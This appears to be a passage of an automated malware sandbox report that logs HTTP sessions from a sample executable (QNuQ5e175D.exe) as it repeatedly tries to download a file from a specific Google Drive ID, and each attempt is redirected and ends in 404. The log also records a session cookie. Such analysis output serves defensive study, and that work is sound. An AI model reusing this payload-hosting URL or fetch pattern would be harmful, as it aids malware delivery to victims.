                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:37 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-H6bzgUX1Je4ck82K8y8T9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      33 | 192.168.2.11 | 50013 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:38 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:38 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSZyitYiO5EdNtK-X7LCxuP3F6eoV2fKRHBh9YP8rCDEI_bndV51fwn3pJnUjU7fGvqhFXdqWA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:38 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-NXrNcZZndc15c350Ma_XUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:38 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6f9b68VpTpJOSdhdBam4fQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      34 | 192.168.2.11 | 50014 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:39 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:40 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:39 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-JEJ6SSe87iPDMIhfFLoIwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.11 | 50015 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:40 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:41 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQek9oxGzHmMKbubWnjsv59Va3Yul-Y0-icPFplRdWlxjvuF4aA3hr3ER2RAc-rnvhM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:40 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-yWbgOx3ZGeyd64PSbVuhbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:41 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ChukKWyHt43ua4R42UtCcw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.11 | 50016 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:41 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:42 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:42 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-RuILr8t6HAsshaoEvAzHNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.11 | 50017 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:42 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:43 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC4CtvgiuzNqD6Vp4OJIXMHd5AkBnmPak_yjkwBEC2qLo3aQqzH-pELs82C9NkGaZlM18Qir1bk
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:43 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Dv_-MqUASgVv1_WCykdIkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:43 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HgWvfkM14dHOj6l6ckpCFg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.11 | 50018 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:44 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:44 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-sI519aV0vLyc2pgF6Uvtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.11 | 50019 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:45 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:45 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTj8JpwWhEFWVkjuaiMhDXKL-ZHcYljt3uPUA7vCdeWVbbsFAhWrHngsJhYyhFhb1LD
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:45 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-tBW8Fb9UJRGoHgcjviWd5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crNw3gjV6PLj5KqaNjOVAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.11 | 50020 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:46 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:46 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce---HDxx26Pe6ZcMgjAsIT3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
